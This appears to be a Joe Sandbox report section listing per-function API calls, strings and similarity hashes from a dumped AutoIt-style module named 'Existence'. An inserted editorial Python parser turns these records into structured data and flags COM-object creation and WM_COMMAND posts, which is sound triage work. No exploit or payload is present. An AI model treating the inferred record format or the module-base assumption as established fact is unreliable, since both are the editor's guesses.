• API ID: AsyncState$ClientCursorScreen
• String ID: $'s$$'s
• API String ID: 4210589936-26749398
• Opcode ID (Opcode Fuzzy Hash): fc0ba20373b715970e92a17c0a008a766a6f2d3fb47eb1de93109fdcb148c152
• Instruction ID: 98709cee7d0db8f4d183002035bc8e63a07a351443454b73399afc64a4d85218
• Instruction Fuzzy Hash: D5418D71A0450AFFEF159FA4C844BEEB774FB05365F60C22AE429A2291C7386E50DB91
• Uniqueness Score: -1.00%

APIs
• LoadIconW.USER32(00000000,00007F03), ref: 0079D1BE
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
• Opcode ID (Opcode Fuzzy Hash): c94131edbafbfe85aeb147543dce55b92afc2e9bae2f887dfd72b1a5c8731dc4
• Instruction ID: 134cf3381b6fbec9c4ee574cb57b280c69388fd40ac4390d29b7555bfca3d4d6
• Instruction Fuzzy Hash: DF11BB7739830EBBEB155B54FC82DAA77AC9F15765B21002AFA00A6281D7BC5E408174
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
Similarity
• API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 642191829-3771769585
• Opcode ID (Opcode Fuzzy Hash): e64c173d36920458554579b1f62ca1b6911c4d42a1b35eb081e8d9cd27e39ac0
• Instruction ID: be5d6c14a947fad421788f8d101745d8f27435d3d9aeba94f143fa72736c23f6
• Instruction Fuzzy Hash: 5111B471900119BBDF34A7B0EC4AEEE77ACDF41715F0000B9F905A6091EFBC9E858665
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
Similarity
• API ID: _wcslen$LocalTime
• String ID:
• API String ID: 952045576-0
• Opcode ID (Opcode Fuzzy Hash): 0278507e3fb5e898ca5253cba400694ef973a1953b8f442d399d708361468c3e
• Instruction ID: a4791964ed8dd9107a32fa25a7cda952866889bdfa8440802cc7b4b651a4918b
• Instruction Fuzzy Hash: 0E419565C11114B9CF21EBF8CC8AACFB768EF05311F908462E918E3121FA78D659C3A6
• Uniqueness Score: -1.00%

APIs
• ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,007739E2,00000004,00000000,00000000), ref: 0074FC41
• ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,007739E2,00000004,00000000,00000000), ref: 0078FC15
• ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,007739E2,00000004,00000000,00000000), ref: 0078FC98
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ShowWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1268545403-0
                                                                                                                                                                                          • Opcode ID: ff43dda3f84250948d956d9f3e042f05644a8be6c25d4ce73f1151fa54bc3097
                                                                                                                                                                                          • Instruction ID: 3c461129bcd8061868dbdb97cb7fd3b30ceb4167f25f972610c7a4e90b593fd6
                                                                                                                                                                                          • Opcode Fuzzy Hash: ff43dda3f84250948d956d9f3e042f05644a8be6c25d4ce73f1151fa54bc3097
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E41F531608788DED7399B38C9CCF7A7B92AB46350F25853DE94746A60D77DA880C731
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• DeleteObject.GDI32(00000000), ref: 007C37B7
• GetDC.USER32(00000000), ref: 007C37BF
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 007C37CA
• ReleaseDC.USER32(00000000,00000000), ref: 007C37D6
• CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007C3812
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007C3823
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007C6504,?,?,000000FF,00000000,?,000000FF,?), ref: 007C385E
• SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007C387D
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Opcode ID: 63cd59f6c2d270bc58b83fa55e7eb880e95018b06ee62e1fa244ff1bd85d4d41
• Instruction ID: c8b0f5825b8a5eb40f293fbcc1f7f72f6da2ab41f97341078ec0890a63c2cdbe
• Opcode Fuzzy Hash: 63cd59f6c2d270bc58b83fa55e7eb880e95018b06ee62e1fa244ff1bd85d4d41
• Instruction Fuzzy Hash: C531A072201214BFEB214F54CC89FEB3BADEF49751F048069FE089A191C6B99C41CBB4
Uniqueness
• Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID:
• String ID: NULL Pointer assignment$Not an Object type
• API String ID: 0-572801152
• Opcode ID: e58292dd387b279785079d190bb766cd3bb79981c7cef3d888805a0c1387af1c
• Instruction ID: 2e22b05fb2242b639a5564489b5ab6de350943de382ee5e7a320527c9c85fddc
• Opcode Fuzzy Hash: e58292dd387b279785079d190bb766cd3bb79981c7cef3d888805a0c1387af1c
• Instruction Fuzzy Hash: 9BD18EB1A0060A9FDF10CFA8C885BEEB7B5BF48304F148569E915AB281E774ED45CB60
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00771B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0077194E
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00771B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 007719D1
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00771B7B,?,00771B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00771A64
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00771B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00771A7B
  • Part of subcall function 00763B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00756A79,?,0000015D,?,?,?,?,007585B0,000000FF,00000000,?,?), ref: 00763BC5
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00771B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00771AF7
• __freea.LIBCMT ref: 00771B22
• __freea.LIBCMT ref: 00771B2E
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
• String ID:
• API String ID: 2829977744-0
• Opcode ID: 61ac0787f90e9fb60ac44cffda6bc2c97e9a7fead676eb4978478db63b1f4f18
• Instruction ID: d2b41f705447c8108699801dd10df995f8bac90e453ad7f5fecc65ea7d1a03b6
• Opcode Fuzzy Hash: 61ac0787f90e9fb60ac44cffda6bc2c97e9a7fead676eb4978478db63b1f4f18
• Instruction Fuzzy Hash: 5091E572E002569BDF208E68CC55EEEBBB5DF09390F598569E909E7150E73CDC41CB60
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Variant$ClearInit
• String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
• API String ID: 2610073882-625585964
• Opcode ID: ff90607737a04b115aa030afa171219aede31f0579b238df6e76be6fb8112785
• Instruction ID: 4a0512f3a4746f90a661a9fbff6d8d05866e15d9763487e7cedb65dbfd2ac969
• Opcode Fuzzy Hash: ff90607737a04b115aa030afa171219aede31f0579b238df6e76be6fb8112785
• Instruction Fuzzy Hash: 0A919C71A00619ABDF24DFA8CC88FEEBBB8EF45714F108559F505AB280D7789945CFA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 007A1C1B
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 007A1C43
• SafeArrayUnaccessData.OLEAUT32(00000000), ref: 007A1C67
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 007A1C97
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 007A1D1E
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 007A1D83
• SafeArrayAccessData.OLEAUT32(00000000,?), ref: 007A1DEF
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ArraySafe$Data$Access$UnaccessVartype
• String ID:
• API String ID: 2550207440-0
• Opcode ID: f5a4887200aded5ba210c42c78a167be8e1f68dd1497926aacad4b8f01b6459e
• Instruction ID: 85b689964e4e313ff2f3245d1885c7c69f5f1641280ce7c1f680e7f56b78e881
• Opcode Fuzzy Hash: f5a4887200aded5ba210c42c78a167be8e1f68dd1497926aacad4b8f01b6459e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D91E571A00219DFEB009FA4C889BFE77B4FF86721F548129E951EB291D77CA940CB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
• Opcode ID: 4208e7254902d7f2b62b34d81ab7bb14dd2de30a6e14f73132c63f7dc8e39a05
• Instruction ID: fefa3736640a9e6096ef56c7881b67942ea0f894526c0f4d89ecb059e95a3721
• Opcode Fuzzy Hash: 4208e7254902d7f2b62b34d81ab7bb14dd2de30a6e14f73132c63f7dc8e39a05
• Instruction Fuzzy Hash: 4E916B71E40219EFDB10CFA9CC84AEEBBB8FF49320F148159E915B7252C7799941CB60
Uniqueness
Uniqueness Score: -1.00%

APIs
• VariantInit.OLEAUT32(?), ref: 007B43C8
• CharUpperBuffW.USER32(?,?), ref: 007B44D7
• _wcslen.LIBCMT ref: 007B44E7
• VariantClear.OLEAUT32(?), ref: 007B467C
  • Part of subcall function 007A169E: VariantInit.OLEAUT32(00000000), ref: 007A16DE
  • Part of subcall function 007A169E: VariantCopy.OLEAUT32(?,?), ref: 007A16E7
  • Part of subcall function 007A169E: VariantClear.OLEAUT32(?), ref: 007A16F3
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4137639002-1221869570
• Opcode ID: 75ac892cc9ca994c721ec00e410d9d69b92dfb9fba6d511d73841fc146b72413
• Instruction ID: e2e6b51b0dc5698f33a30eaf487593bc81cbcbd0cc76872677cba6490d130cc0
• Opcode Fuzzy Hash: 75ac892cc9ca994c721ec00e410d9d69b92dfb9fba6d511d73841fc146b72413
• Instruction Fuzzy Hash: 74914674608341DFC714DF24C484AAAB7E5BF89714F14892DF8899B352DB39ED06CB92
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 007908FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00790831,80070057,?,?,?,00790C4E), ref: 0079091B
  • Part of subcall function 007908FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00790831,80070057,?,?), ref: 00790936
  • Part of subcall function 007908FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00790831,80070057,?,?), ref: 00790944
  • Part of subcall function 007908FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00790831,80070057,?), ref: 00790954
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 007B56AE
• _wcslen.LIBCMT ref: 007B57B6
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 007B582C
• CoTaskMemFree.OLE32(?), ref: 007B5837
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
• String ID: NULL Pointer assignment
• API String ID: 614568839-2785691316
• Opcode ID: a036017ddf5ec69f1fc1a80e2e8b75c9cb4b5700ba911f6afc1af4d84bdd44d0
• Instruction ID: 32632e3d7eb486adbc2c9d7aab74e125dd657c952bfd670adba41980b85f44a5
• Opcode Fuzzy Hash: a036017ddf5ec69f1fc1a80e2e8b75c9cb4b5700ba911f6afc1af4d84bdd44d0
• Instruction Fuzzy Hash: 0E91F571D00219EFDF10DFA4D885FEEB7B9AF08314F104569E915A7251DB789A44CFA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetMenu.USER32(?), ref: 007C2C1F
• GetMenuItemCount.USER32(00000000), ref: 007C2C51
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007C2C79
• _wcslen.LIBCMT ref: 007C2CAF
• GetMenuItemID.USER32(?,?), ref: 007C2CE9
• GetSubMenu.USER32(?,?), ref: 007C2CF7
  • Part of subcall function 00794393: GetWindowThreadProcessId.USER32(?,00000000), ref: 007943AD
  • Part of subcall function 00794393: GetCurrentThreadId.KERNEL32 ref: 007943B4
  • Part of subcall function 00794393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00792F00), ref: 007943BB
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007C2D7F
  • Part of subcall function 0079F292: Sleep.KERNEL32 ref: 0079F30A
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
• String ID:
• API String ID: 4196846111-0
• Opcode ID: fc065ef15b4098d1fa56b94c8e39a763c76389dc780bc5de00c96489a2aec8f1
• Instruction ID: 8b9071f03fe55151f46c0972748e8065622e6d2457e0cdbc34b166d0f09461ef
• Opcode Fuzzy Hash: fc065ef15b4098d1fa56b94c8e39a763c76389dc780bc5de00c96489a2aec8f1
• Instruction Fuzzy Hash: 47715D75A00205EFCB14EF64C845FAEB7B5EF48310F14846DE816AB352DB78EE428B90
Uniqueness
Uniqueness Score: -1.00%

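The records above are Joe Sandbox's per-function entries for the module dumped at 00730000 in process 0000000A: each lists the API calls with their call-site addresses (direct calls and calls attributed to a subcall), the strings the function references, and the opcode and instruction fuzzy hashes used for similarity matching. Reading dozens of these by hand is slow, so the following added example (editorial code, not part of the Joe Sandbox report or its tooling) parses records in this layout into structured objects and answers two questions a triager would ask of them: which functions create COM objects and with what CLSCTX, and which post WM_COMMAND (0x111) into another window. The input format is inferred from the entries on this page and the sample text is copied from two of them; the assumption that the "Offset:" of the Source File line is the module base, used to rebase call sites to RVAs that can be looked up in the downloaded dump, is mine. The CLSCTX bit values and the WM_COMMAND message number are Windows SDK constants.

```python
"""Parse Joe Sandbox per-function records (APIs / Strings / Memory Dump Source /
Similarity / Uniqueness) and query them. Added example, not Joe Sandbox code."""
from __future__ import annotations
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample input: two entries copied from the report section above.
SAMPLE = """\
APIs
  • Part of subcall function 007908FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00790831,80070057,?,?,?,00790C4E), ref: 0079091B
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 007B56AE
• _wcslen.LIBCMT ref: 007B57B6
• CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 007B582C
• CoTaskMemFree.OLE32(?), ref: 007B5837
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
• String ID: NULL Pointer assignment
• API String ID: 614568839-2785691316
• Instruction Fuzzy Hash: 0E91F571D00219EFDF10DFA4D885FEEB7B9AF08314F104569E915A7251DB789A44CFA0
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetMenu.USER32(?), ref: 007C2C1F
  • Part of subcall function 00794393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00792F00), ref: 007943BB
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007C2D7F
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
Similarity
• API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
• String ID:
• API String ID: 4196846111-0
Uniqueness
Uniqueness Score: -1.00%
"""

# One API line: optional "Part of subcall function XXXXXXXX: " prefix, Name.MODULE,
# an optional "(args)" (absent for e.g. _wcslen.LIBCMT), then "ref: <call site>".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",? ref: (?P<ref>[0-9A-F]{8})$"
)
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Similarity", "Uniqueness"}
# CLSCTX flag bits (Windows SDK) for decoding CoCreateInstanceEx's dwClsCtx argument.
CLSCTX = {0x1: "CLSCTX_INPROC_SERVER", 0x2: "CLSCTX_INPROC_HANDLER",
          0x4: "CLSCTX_LOCAL_SERVER", 0x10: "CLSCTX_REMOTE_SERVER"}
WM_COMMAND = 0x111


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]          # raw argument text; "?" means the sandbox could not resolve it
    ref: int                 # call-site address in the dump
    caller: Optional[int]    # set when the call is attributed to a subcall function


@dataclass
class FunctionEntry:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    similarity: dict[str, str] = field(default_factory=dict)
    base: Optional[int] = None   # "Offset:" of the source dump; assumed to be the module base
    uniqueness: Optional[str] = None

    def rva(self, addr: int) -> int:
        if self.base is None:
            raise ValueError("entry has no Source File offset to rebase against")
        return addr - self.base


def parse_entries(text: str) -> list[FunctionEntry]:
    entries, cur, section = [], FunctionEntry(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        if line.startswith("Uniqueness Score:"):      # last line of every record
            cur.uniqueness = line.split(":", 1)[1].strip()
            entries.append(cur)
            cur, section = FunctionEntry(), None
            continue
        line = line.lstrip("• ").strip()
        if section == "APIs":
            m = API_RE.match(line)
            if not m:
                raise ValueError(f"unrecognised API line: {line!r}")
            args = m["args"].split(",") if m["args"] else []
            cur.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                                    int(m["caller"], 16) if m["caller"] else None))
        elif section == "Strings":
            cur.strings.append(line)
        elif section == "Memory Dump Source" and line.startswith("Source File:"):
            off = re.search(r"Offset: ([0-9A-F]{8})", line)
            cur.base = int(off[1], 16) if off else None
        elif section == "Similarity":
            key, _, value = line.partition(":")
            cur.similarity[key.strip()] = value.strip()
    return entries


def direct_calls(entry: FunctionEntry, name: str) -> list[ApiCall]:
    """Calls the function makes itself, excluding those attributed to subcalls."""
    return [c for c in entry.apis if c.name == name and c.caller is None]


def decode_clsctx(call: ApiCall) -> list[str]:
    """Expand the dwClsCtx bits of a CoCreateInstanceEx call (third argument)."""
    if len(call.args) < 3 or call.args[2] == "?":
        return []
    ctx = int(call.args[2], 16)
    return [n for bit, n in CLSCTX.items() if ctx & bit]


def find_com_creators(entries: list[FunctionEntry]) -> list[tuple[int, list[str]]]:
    """(call-site RVA, CLSCTX flags) for every direct CoCreateInstanceEx call."""
    return [(e.rva(c.ref), decode_clsctx(c))
            for e in entries for c in direct_calls(e, "CoCreateInstanceEx")]


def find_wm_command_posters(entries: list[FunctionEntry]) -> list[int]:
    """Call-site RVAs of PostMessageW calls whose Msg argument is WM_COMMAND."""
    return [e.rva(c.ref) for e in entries for c in direct_calls(e, "PostMessageW")
            if len(c.args) > 1 and c.args[1] != "?" and int(c.args[1], 16) == WM_COMMAND]


if __name__ == "__main__":
    recs = parse_entries(SAMPLE)
    for rva, flags in find_com_creators(recs):
        print(f"CoCreateInstanceEx at RVA {rva:#x} with {'|'.join(flags)}")
    for rva in find_wm_command_posters(recs):
        print(f"PostMessageW(WM_COMMAND) at RVA {rva:#x}")
```

For the two sample records the COM creator resolves to RVA 0x8582C with CLSCTX_INPROC_SERVER|CLSCTX_LOCAL_SERVER|CLSCTX_REMOTE_SERVER (0x15), and the WM_COMMAND poster to RVA 0x92D7F; loading the "Download File" dump for 0000000A.00000002.2228440113 at its stated base lets those offsets be followed straight to the call sites.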
APIs
• IsWindow.USER32(00000000), ref: 007C8992
• IsWindowEnabled.USER32(00000000), ref: 007C899E
• SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 007C8A79
• SendMessageW.USER32(00000000,000000B0,?,?), ref: 007C8AAC
• IsDlgButtonChecked.USER32(?,00000000), ref: 007C8AE4
• GetWindowLongW.USER32(00000000,000000EC), ref: 007C8B06
• SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007C8B1E
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4072528602-0
                                                                                                                                                                                          • Opcode ID: d646f3e03561abbf514ac9de17273a5b7a91d6676528b9a3d625619ae3061914
                                                                                                                                                                                          • Instruction ID: 27cfb04fd4930b8d56822e7af686578e78972ea7bdc9f44d5b877b70b62d9005
                                                                                                                                                                                          • Opcode Fuzzy Hash: d646f3e03561abbf514ac9de17273a5b7a91d6676528b9a3d625619ae3061914
                                                                                                                                                                                          • Instruction Fuzzy Hash: 43716C74600604EFDBA1DF54C888FBEBBB5EF4A300F14855EE94567261CB39AD80DB52
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetParent.USER32(?), ref: 0079B8C0
• GetKeyboardState.USER32(?), ref: 0079B8D5
• SetKeyboardState.USER32(?), ref: 0079B936
• PostMessageW.USER32(?,00000101,00000010,?), ref: 0079B964
• PostMessageW.USER32(?,00000101,00000011,?), ref: 0079B983
• PostMessageW.USER32(?,00000101,00000012,?), ref: 0079B9C4
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 0079B9E7
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
